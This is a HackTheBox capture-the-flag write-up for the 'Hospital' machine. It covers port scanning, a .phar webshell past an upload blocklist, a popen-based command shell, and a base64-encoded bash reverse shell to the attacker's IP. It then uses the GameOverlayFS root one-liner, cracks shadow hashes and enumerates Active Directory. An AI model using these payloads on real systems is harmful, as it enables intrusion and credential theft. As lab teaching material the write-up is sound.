# Hospital - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Hospital was a decent, medium-rated HTB Windows machine created by [ruycr4ft](https://app.hackthebox.com/users/1253217)

The foothold involves working around upload filter and blocklisted functions.  
Midway through the box, GameOverlayFS and Ghostscript RCE through EPS attachment are used to pivot.  
For EoP, multiple unintended approaches are possible, but the intended approach involves a keylogger.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.241
Nmap scan report for 10.10.11.241
Host is up (0.21s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
443/tcp  open  https
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1801/tcp open  msmq
2103/tcp open  zephyr-clt
2105/tcp open  eklogin
2107/tcp open  msmq-mgmt
2179/tcp open  vmrdp
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5985/tcp open  wsman
6404/tcp open  boe-filesvr
6406/tcp open  boe-processsvr
6407/tcp open  boe-resssvr1
6409/tcp open  boe-resssvr3
6616/tcp open  unknown
6631/tcp open  unknown
6644/tcp open  unknown
8080/tcp open  http-proxy
9389/tcp open  adws
```

```console
opcode@debian$ nmap -sC -sV -p 22,53,88,135,139,389,443,445,464,593,636,1801,2103,2105,2107,2179,3268,3269,5985,6404,6406,6407,6409,6616,6631,6644,8080,9389 -oN hospital.nmap 10.10.11.241
Nmap scan report for 10.10.11.241
Host is up (0.22s latency).

PORT     STATE SERVICE           VERSION
22/tcp   open  ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e14b4b3a6d18666939f7aa74b3160aaa (ECDSA)
|_  256 96c1dcd8972095e7015f20a24361cbca (ED25519)
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-04-14 01:56:53Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
443/tcp  open  ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
1801/tcp open  msmq?
2103/tcp open  msrpc             Microsoft Windows RPC
2105/tcp open  msrpc             Microsoft Windows RPC
2107/tcp open  msrpc             Microsoft Windows RPC
2179/tcp open  vmrdp?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
5985/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6404/tcp open  msrpc             Microsoft Windows RPC
6406/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
6407/tcp open  msrpc             Microsoft Windows RPC
6409/tcp open  msrpc             Microsoft Windows RPC
6616/tcp open  msrpc             Microsoft Windows RPC
6631/tcp open  msrpc             Microsoft Windows RPC
6644/tcp open  msrpc             Microsoft Windows RPC
8080/tcp open  http              Apache httpd 2.4.55 ((Ubuntu))
|_http-server-header: Apache/2.4.55 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Login
|_Requested resource was login.php
9389/tcp open  mc-nmf            .NET Message Framing
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-04-14T01:57:56
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: 53s
```

DNS, Kerberos, SMB, RPC, LDAP, WinRM, and other ports are open. It is likely a Domain Controller.  
The SSH port (22) and HTTPS (443) ports are open as well.

We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.11.241 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=hospital,DC=htb
ldapServiceName: hospital.htb:dc$@HOSPITAL.HTB
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=hospital,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=hospital,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=hospital,DC=htb
namingContexts: DC=hospital,DC=htb
namingContexts: CN=Configuration,DC=hospital,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=hospital,DC=htb
namingContexts: DC=DomainDnsZones,DC=hospital,DC=htb
namingContexts: DC=ForestDnsZones,DC=hospital,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 459452
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=hospital,DC=htb
dnsHostName: DC.hospital.htb
defaultNamingContext: DC=hospital,DC=htb
currentTime: 20240414020014.0Z
configurationNamingContext: CN=Configuration,DC=hospital,DC=htb
```

The `dnsHostName` is set to FQDN `DC.hospital.htb`; we can add it to `/etc/hosts`:

```text
10.10.11.241 DC.hospital.htb hospital.htb DC
```

## SMB enumeration

To enumerate SMB shares, [NetExec](https://github.com/Pennyw0rth/NetExec) is my tool of choice:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@244ea95da6a7:~# echo '10.10.11.241 DC.hospital.htb hospital.htb DC' >> /etc/hosts
```

Testing for null session:

```console
root@244ea95da6a7:~# nxc smb 10.10.11.241 -d hospital.htb -u '' -p '' --shares
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.241    445    DC               [-] hospital.htb\: STATUS_ACCESS_DENIED 
SMB         10.10.11.241    445    DC               [-] Error getting user: list index out of range
SMB         10.10.11.241    445    DC               [-] Error enumerating shares: Error occurs while reading from remote(104)
```

Null sessions are disabled. (The error is different from the usual one, though)  
Testing for guest session:

```console
root@244ea95da6a7:~# nxc smb 10.10.11.241 -d hospital.htb -u 'opcode' -p '' --shares
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.241    445    DC               [-] hospital.htb\opcode: STATUS_LOGON_FAILURE 
```

Guest sessions are disabled as well.

## Upload filter and blocklisted functions

On the HTTPS port, <https://hospital.htb/> leads to the login page for RoundCube Webmail.  
<http://hospital.htb:8080/> leads to `/login.php`, yet another login page.  
I tried `admin:admin`, other weak credentials and SQL injection, but they did not work.

On `/register.php`, I registered an account with the credentials `opcode:opcode` and was able to log in.  
The home page, `/index.php`, only offers the functionality to upload image files, and uploaded files can be accessed at `/uploads/filename`.

I tried to upload webshells, but they have an extension-based blocklist. Through hints, I learnt that the `.phar` extension is not blocked, and can be uploaded to execute PHP code.  
In a classic shabby CTF fashion, some utterly weird design choices have been made, with an unreasonably forced solution.  
`.phar` files work because the `.htaccess` file contains the directive `AddType application/x-httpd-php .phar`. I can't imagine why someone would do that in a web application in the real world.

I uploaded `res.phar` with contents `<?php phpinfo();?>` and was able to view `phpinfo` output at <http://hospital.htb:8080/uploads/res.phar>  
Within the deluge of information, a list of disabled functions can also be found:

```text
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,system,shell_exec,exec,proc_open,preg_replace,passthru,curl_exec
```

Most of the functions which allow OS command execution have been disabled.  
We can still read local files. To achieve the same, I uploaded `lfr.phar` with contents:

```php
<?php readfile($_GET['f']); ?>
```

```console
opcode@debian$ curl 'http://hospital.htb:8080/uploads/lfr.phar?f=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:106::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:101:1::/var/cache/pollinate:/bin/false
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
syslog:x:103:109::/nonexistent:/usr/sbin/nologin
uuidd:x:104:110::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:111::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:113::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:108:114:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
drwilliams:x:1000:1000:Lucy Williams:/home/drwilliams:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:109:116:MySQL Server,,,:/nonexistent:/bin/false
```

The username `drwilliams` can be noted.  
I tried looking at `proc` filesystem, but it offered limited success.

```console
opcode@debian$ curl 'http://hospital.htb:8080/uploads/lfr.phar?f=/etc/apache2/sites-enabled/000-default.conf' | grep -v '#'
<VirtualHost *:80>

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	DirectoryIndex index.php

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>
```

I guessed the entry point to be `index.php` and found other pages.

```console
opcode@debian$ curl 'http://hospital.htb:8080/uploads/lfr.phar?f=/var/www/html/upload.php'
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {

    if (isset($_FILES['image'])) {
        $blockedExtensions = ['php', 'php1', 'php2', 'php3', 'php4', 'php5', 'php6', 'php7', 'php8', 'phtml', 'html', 'aspx', 'asp'];
        $uploadDirectory = 'uploads/';
        $uploadedFile = $uploadDirectory . basename($_FILES['image']['name']);
        $fileExtension = strtolower(pathinfo($uploadedFile, PATHINFO_EXTENSION));

        if (!in_array($fileExtension, $blockedExtensions)) {
            if (move_uploaded_file($_FILES['image']['tmp_name'], $uploadedFile)) {
                header("Location: /success.php");
                exit;
            } else {
                header("Location: /failed.php");
                exit;
            }
        } else {
            header("Location: /failed.php");
            exit;
        }
    }
}
?>
```

As expected, it is a lame filter.

```console
opcode@debian$ curl 'http://hospital.htb:8080/uploads/lfr.phar?f=/var/www/html/config.php'
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'my$qls3rv1c3!');
define('DB_NAME', 'hospital');
 
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
```

We have the credentials `root:my$qls3rv1c3!`  
But they aren't usable on SSH or roundcube.

I returned to the list of blocked functions and compared it against <https://gist.github.com/mccabe615/b0907514d34b2de088c4996933ea1720>. I found that `popen` was not included in the box's blocklist. To abuse it, I created `opcode.phar`

```php
<?php
$handle = popen($_GET['c'], 'r');

if ($handle) {
    while (!feof($handle)) {
        $output = fgets($handle);
        echo $output;
    }
    pclose($handle);
}
?>
```

I uploaded it and got RCE:

```console
opcode@debian$ curl 'http://hospital.htb:8080/uploads/opcode.phar?c=id'                     
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

To get a shell, I used:

```console
opcode@debian$ curl 'http://hospital.htb:8080/uploads/opcode.phar?c=echo+YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTY1LzkwMDEgMD4mMScK|base64+-d|bash'
```

Next, I stabilized the shell:

```console
www-data@webserver:/var/www$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@webserver:/var/www$ ^Z
[1]  + 3301 suspended  nc -lnvp 9001
opcode@debian$ stty raw -echo; fg
www-data@webserver:/var/www$ export TERM=xterm-256color
www-data@webserver:/var/www$ exec /bin/bash
```

I connected to the MySQL database to look for credentials:

```console
www-data@webserver:/tmp$ mysql --user=root --password='my$qls3rv1c3!'
```

```console
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| hospital           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.005 sec)

MariaDB [(none)]> use hospital;
```

```console
MariaDB [hospital]> show tables;
+--------------------+
| Tables_in_hospital |
+--------------------+
| users              |
+--------------------+
1 row in set (0.000 sec)

MariaDB [hospital]> select * from users;
+----+----------+--------------------------------------------------------------+---------------------+
| id | username | password                                                     | created_at          |
+----+----------+--------------------------------------------------------------+---------------------+
|  1 | admin    | $2y$10$caGIEbf9DBF7ddlByqCkrexkt0cPseJJ5FiVO1cnhG.3NLrxcjMh2 | 2023-09-21 14:46:04 |
|  2 | patient  | $2y$10$a.lNstD7JdiNYxEepKf1/OZ5EM5wngYrf.m5RxXCgSud7MVU6/tgO | 2023-09-21 15:35:11 |
|  3 | opcode   | $2y$10$bLLpIaGGwNDhUA6ttiDkL.FjFGZpAJeJvmV2bVdPIRPKpv4NDS8fS | 2023-11-19 02:29:54 |
+----+----------+--------------------------------------------------------------+---------------------+
```

We can try cracking those two hashes:

```console
opcode@debian$ john/john --wordlist=/home/opcode/CTF/wordlists/rockyou.txt hash
```

`admin`'s password cracks immediately to `123456` but it was useless.  

## GameOverlayFS and Hyper-V VM

I suspected that the current linux instance is running on Hyper-V

```console
www-data@webserver:/var/www$ cat /sys/devices/virtual/dmi/id/sys_vendor
Microsoft Corporation
```

I tried running [miniss](https://github.com/noraj/miniss), but it was not useful:

```console
www-data@webserver:/tmp$ ./miniss 
type local address        remote address         state       username (uid)
tcp  127.0.0.1:3306       0.0.0.0:0              LISTEN      mysql (109)
tcp  127.0.0.53:53        0.0.0.0:0              LISTEN      systemd-resolve (996)
tcp  127.0.0.54:53        0.0.0.0:0              LISTEN      systemd-resolve (996)
tcp  192.168.5.2:51924    10.10.14.165:9001       ESTABLISHED www-data (33)
tcp  [::]:80              [::]:0                 LISTEN      root (0)
tcp  [::]:22              [::]:0                 LISTEN      root (0)
tcp  [::ffff:c0a8:502]:80 [::ffff:a0a:e2e]:55498 CLOSE_WAIT  www-data (33)
udp  127.0.0.54:53        0.0.0.0:0              CLOSE       systemd-resolve (996)
udp  127.0.0.53:53        0.0.0.0:0              CLOSE       systemd-resolve (996)
```

I ran `linpeas.sh` but could not find anything.  
I try to upload [statically linked `nmap` binary](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) and scan for open ports on host whenever I land in a docker container or Hyper-V VM.  

```console
ww-data@webserver:/tmp$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.5.2  netmask 255.255.255.0  broadcast 192.168.5.255
        inet6 fe80::215:5dff:fe00:8a02  prefixlen 64  scopeid 0x20<link>
        ether 00:15:5d:00:8a:02  txqueuelen 1000  (Ethernet)
        RX packets 274996  bytes 82840512 (82.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 390558  bytes 141294982 (141.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 177495  bytes 12700565 (12.7 MB)
        RX errors 0  dropped 1226  overruns 0  frame 0
        TX packets 177495  bytes 12700565 (12.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```

```console
www-data@webserver:/tmp$ ./nmap -v -p- --min-rate 1000 192.168.5.1
Nmap scan report for 192.168.5.1
Host is up (0.0011s latency).
Not shown: 65508 filtered ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos
135/tcp  open  epmap
139/tcp  open  netbios-ssn
389/tcp  open  ldap
443/tcp  open  https
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd
593/tcp  open  unknown
636/tcp  open  ldaps
1801/tcp open  unknown
2103/tcp open  unknown
2105/tcp open  unknown
2107/tcp open  unknown
2179/tcp open  unknown
3268/tcp open  unknown
3269/tcp open  unknown
3389/tcp open  ms-wbt-server
5985/tcp open  unknown
6404/tcp open  unknown
6406/tcp open  unknown
6407/tcp open  unknown
6409/tcp open  unknown
6616/tcp open  unknown
6631/tcp open  unknown
6645/tcp open  unknown
9389/tcp open  unknown
```

Tunneling is not needed as those ports were already exposed.

I had to take another hint to learn that the kernel exploit [GameOverlayFS](https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/) it to be used next:

```console
www-data@webserver:/tmp$ uname -a
Linux webserver 5.19.0-35-generic #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
www-data@webserver:/tmp$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash")'
```

It worked and I got shell as root:

```console
root@webserver:/tmp# id
uid=0(root) gid=33(www-data) groups=33(www-data)
```

After getting root, I tried to crack password hashes from shadow:

```console
root@webserver:/root# cat /etc/shadow | grep '\$'
root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::

root@webserver:/root# cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
drwilliams:x:1000:1000:Lucy Williams:/home/drwilliams:/bin/bash
```

The root's hash and user's hash are of two different kinds. Surely, one is meant to be cracked.

```console
opcode@debian$ john/unshadow passwd shadow > unshadowed
opcode@debian$ john/john --wordlist=/home/opcode/CTF/wordlists/rockyou.txt unshadowed
```

It took a while, and `drwilliams` password cracked:

```text
drwilliams:qwe123!@#
```

The username and password are valid on Active Directory:

```console
opcode@debian$ sudo ntpdate hospital.htb
opcode@debian$ echo drwilliams | kerbrute userenum --dc 10.10.11.241 -d hospital.htb -
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/18/24 - Ronnie Flathers @ropnop

2024/04/18 11:09:59 >  Using KDC(s):
2024/04/18 11:09:59 >   10.10.11.241:88

2024/04/18 11:10:04 >  [+] VALID USERNAME:   drwilliams@hospital.htb
2024/04/18 11:10:04 >  Done! Tested 1 usernames (1 valid) in 5.403 seconds

opcode@debian$ echo drwilliams | kerbrute passwordspray --dc 10.10.11.241 -d hospital.htb - 'qwe123!@#'
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/18/24 - Ronnie Flathers @ropnop

2024/04/18 11:10:44 >  Using KDC(s):
2024/04/18 11:10:44 >   10.10.11.241:88

2024/04/18 11:10:45 >  [+] VALID LOGIN:  drwilliams@hospital.htb:qwe123!@#
2024/04/18 11:10:45 >  Done! Tested 1 logins (1 successes) in 0.842 seconds
```

## Post-credential AD enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@244ea95da6a7:~# nxc smb 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' --shares
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.241    445    DC               [+] hospital.htb\drwilliams:qwe123!@# 
SMB         10.10.11.241    445    DC               [*] Enumerated shares
SMB         10.10.11.241    445    DC               Share           Permissions     Remark
SMB         10.10.11.241    445    DC               -----           -----------     ------
SMB         10.10.11.241    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.241    445    DC               C$                              Default share
SMB         10.10.11.241    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.241    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.241    445    DC               SYSVOL          READ            Logon server share 
```

RID cycling:

```console
root@244ea95da6a7:~# nxc smb 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' --rid-brute 10000
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.241    445    DC               [+] hospital.htb\drwilliams:qwe123!@# 
[--SNIP--]
SMB         10.10.11.241    445    DC               1000: HOSPITAL\DC$ (SidTypeUser)
SMB         10.10.11.241    445    DC               1101: HOSPITAL\DnsAdmins (SidTypeAlias)
SMB         10.10.11.241    445    DC               1102: HOSPITAL\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.241    445    DC               1124: HOSPITAL\$431000-R1KSAI1DGHMH (SidTypeUser)
SMB         10.10.11.241    445    DC               1125: HOSPITAL\SM_0559ce7ac4be4fc6a (SidTypeUser)
SMB         10.10.11.241    445    DC               1126: HOSPITAL\SM_bb030ff39b6c4a2db (SidTypeUser)
SMB         10.10.11.241    445    DC               1127: HOSPITAL\SM_9326b57ae8ea44309 (SidTypeUser)
SMB         10.10.11.241    445    DC               1128: HOSPITAL\SM_b1b9e7f83082488ea (SidTypeUser)
SMB         10.10.11.241    445    DC               1129: HOSPITAL\SM_e5b6f3aed4da4ac98 (SidTypeUser)
SMB         10.10.11.241    445    DC               1130: HOSPITAL\SM_75554ef7137f41d68 (SidTypeUser)
SMB         10.10.11.241    445    DC               1131: HOSPITAL\SM_6e9de17029164abdb (SidTypeUser)
SMB         10.10.11.241    445    DC               1132: HOSPITAL\SM_5faa2be1160c4ead8 (SidTypeUser)
SMB         10.10.11.241    445    DC               1133: HOSPITAL\SM_2fe3f3cbbafa4566a (SidTypeUser)
SMB         10.10.11.241    445    DC               1601: HOSPITAL\drbrown (SidTypeUser)
SMB         10.10.11.241    445    DC               1602: HOSPITAL\drwilliams (SidTypeUser)
SMB         10.10.11.241    445    DC               3101: HOSPITAL\Loggers (SidTypeAlias)
```

I also check a few other modules:

```console
root@244ea95da6a7:~# nxc smb 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' -M enum_av
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.241    445    DC               [+] hospital.htb\drwilliams:qwe123!@# 
ENUM_AV     10.10.11.241    445    DC               Found NOTHING!

root@244ea95da6a7:~# nxc ldap 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' -M adcs
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.241    636    DC               [+] hospital.htb\drwilliams:qwe123!@# 
ADCS        10.10.11.241    389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@244ea95da6a7:~# nxc ldap 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' -M MAQ
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.241    636    DC               [+] hospital.htb\drwilliams:qwe123!@# 
MAQ         10.10.11.241    389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.11.241    389    DC               MachineAccountQuota: 0

root@244ea95da6a7:~# nxc ldap 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' -M whoami
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.241    636    DC               [+] hospital.htb\drwilliams:qwe123!@# 
WHOAMI      10.10.11.241    389    DC               distinguishedName: CN=Lucy Williams,CN=Users,DC=hospital,DC=htb
WHOAMI      10.10.11.241    389    DC               Member of: CN=Users,CN=Builtin,DC=hospital,DC=htb
WHOAMI      10.10.11.241    389    DC               name: Lucy Williams
WHOAMI      10.10.11.241    389    DC               Enabled: Yes
WHOAMI      10.10.11.241    389    DC               Password Never Expires: Yes
WHOAMI      10.10.11.241    389    DC               Last logon: 133578931241898559
WHOAMI      10.10.11.241    389    DC               pwdLastSet: 133386680266551481
WHOAMI      10.10.11.241    389    DC               logonCount: 589
WHOAMI      10.10.11.241    389    DC               sAMAccountName: drwilliams
```

And some groups:

```console
root@244ea95da6a7:~# nxc ldap 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' -M group-mem -o group='Remote Management Users'
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.241    636    DC               [+] hospital.htb\drwilliams:qwe123!@# 
GROUP-ME... 10.10.11.241    389    DC               [+] Found the following members of the Remote Management Users group:
GROUP-ME... 10.10.11.241    389    DC               drbrown

root@244ea95da6a7:~# root@8e2705770ef3:~# nxc ldap 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' -M group-mem -o group='Remote Desktop Users'
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.241    636    DC               [+] hospital.htb\drwilliams:qwe123!@# 
GROUP-ME... 10.10.11.241    389    DC               [+] Found the following members of the Remote Desktop Users group:
GROUP-ME... 10.10.11.241    389    DC               drbrown

root@244ea95da6a7:~# nxc ldap 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' -M group-mem -o group='Administrators'
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.241    636    DC               [+] hospital.htb\drwilliams:qwe123!@# 
GROUP-ME... 10.10.11.241    389    DC               [+] Found the following members of the Administrators group:
GROUP-ME... 10.10.11.241    389    DC               Administrator
